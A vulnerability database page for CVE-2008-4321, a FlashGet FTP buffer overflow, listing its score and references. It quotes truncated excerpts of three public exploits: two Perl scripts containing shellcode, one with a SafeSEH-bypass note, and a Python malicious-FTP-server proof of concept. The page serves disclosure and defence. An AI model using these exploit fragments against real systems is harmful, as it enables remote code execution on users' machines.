CVE-2008-4321
published 2008-09-29CVE-2008-4321: Buffer overflow in FlashGet (formerly JetCar) FTP 1.9 allows remote FTP servers to execute arbitrary code via a long response to the PWD command.
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
5.74%
92.1th percentile
Buffer overflow in FlashGet (formerly JetCar) FTP 1.9 allows remote FTP servers to execute arbitrary code via a long response to the PWD command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flashget | flashget_ftp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
FlashGet 1.9.0.1012 - 'FTP PWD Response' Remote Buffer Overflow (SafeSEH)
exploitdb·2008-08-17
CVE-2008-4321 FlashGet 1.9.0.1012 - 'FTP PWD Response' Remote Buffer Overflow (SafeSEH)
FlashGet 1.9.0.1012 - 'FTP PWD Response' Remote Buffer Overflow (SafeSEH)
---
#!/usr/bin/perl
# k`sOSe 08/17/2008
# bypass safeseh using flash9f.ocx.
use warnings;
use strict;
use IO::Socket;
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6b".
"\xa3\x03\x10\x83\xeb\xfc\xe2\xf4\x97\x4b\x47\x10\x6b\xa3\x88\x55".
"\x57\x28\x7f\x15\x13\xa2\xec\x9b\x24\xbb\x88\x4f\x4b\xa2\xe8\x59".
"\xe0\x97\x88\x11\x85\x92\xc3\x89\xc7\x27\xc3\x64\x6c\x62\xc9\x1d".
"\x6a\x61\xe8\xe4\x50\xf7\x27\x14\x1e\x46\x88\x4f\x4f\xa2\xe8\x76".
"\xe0\xaf\x48\x9b\x34\xbf\x02\xfb\xe0\xbf\x88\x11\x80\x2a\x5f\x34".
"\x6f\x60\x32\xd0\x0f\x28\x43\x20\xee\x63\x7b\x1c\xe0\xe3\x0f\x9b".
"\x1b\xbf\xae\x9b\x03\
Exploit-DB
FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH Stack Overflow
exploitdb·2008-08-15
CVE-2008-4321 FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH Stack Overflow
FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH Stack Overflow
---
#!/usr/bin/perl
# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit
# Coded By SkOd, skod.uk at gmail dot com
# Tested over Windows XP sp1 Hebrew
# link your victim to - ftp://localhost/somefile.TORRENT - over internet explorer.
##
# PoC by Krystian Kloskowski (h07)
# http://milw0rm.com/exploits/6240
##
# special thanks to a friend of mine who helped me
use IO::Socket;
####################################[ Parameters ]########################################
my $SHELLCODE =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6b".
"\xa3\x03\x10\x83\xeb\xfc\xe2\xf4\x97\x4b\x47\x10\x6b\xa3\x88\x55".
"\x57\x28\x7f\x15\x13\xa2\xec\x9b\x24\xbb\x88\x4f\x4b\xa2\xe8\x59".
"\xe0\x97\x88\x11\x85\x92\xc3\x
Exploit-DB
FlashGet 1.9 - 'FTP PWD Response' Remote Buffer Overflow (PoC)
exploitdb·2008-08-13
CVE-2008-4321 FlashGet 1.9 - 'FTP PWD Response' Remote Buffer Overflow (PoC)
FlashGet 1.9 - 'FTP PWD Response' Remote Buffer Overflow (PoC)
---
#!/usr/bin/python
# FlashGet 1.9 (FTP PWD Response) 0day Remote Buffer Overflow PoC Exploit
# Bug discovered by Krystian Kloskowski (h07)
# Testen on: FlashGet 1.9 / XP SP2 Polish
# Product URL: http://www.flashget.com/en/download.htm?uid=undefined
# Details:..
#
# 257 "[AAAA..332]/" is current directory.\r\n N/A
# ----------------------------------------------------------------
# Just for fun ;]
##
from time import sleep
from socket import *
res = [
'220 WELCOME!! :x\r\n',
'331 Password required for %s.\r\n',
'230 User %s logged in.\r\n',
'250 CWD command successful.\r\n',
'257 "%s/" is current directory.\r\n' # <-- %s B0f :x
]
buf = 'A' * 332
s = socket(AF_INET, SOCK_STREAM)
s.bind(('0.0.0.0', 21))
s.listen(1)
print
No writeups or analysis indexed.
http://secunia.com/advisories/31481http://securityreason.com/securityalert/4327http://www.securityfocus.com/bid/30685http://www.vupen.com/english/advisories/2008/2381https://exchange.xforce.ibmcloud.com/vulnerabilities/44443https://www.exploit-db.com/exploits/6240https://www.exploit-db.com/exploits/6248https://www.exploit-db.com/exploits/6256http://secunia.com/advisories/31481http://securityreason.com/securityalert/4327http://www.securityfocus.com/bid/30685http://www.vupen.com/english/advisories/2008/2381https://exchange.xforce.ibmcloud.com/vulnerabilities/44443https://www.exploit-db.com/exploits/6240https://www.exploit-db.com/exploits/6248https://www.exploit-db.com/exploits/6256
2008-09-29
Published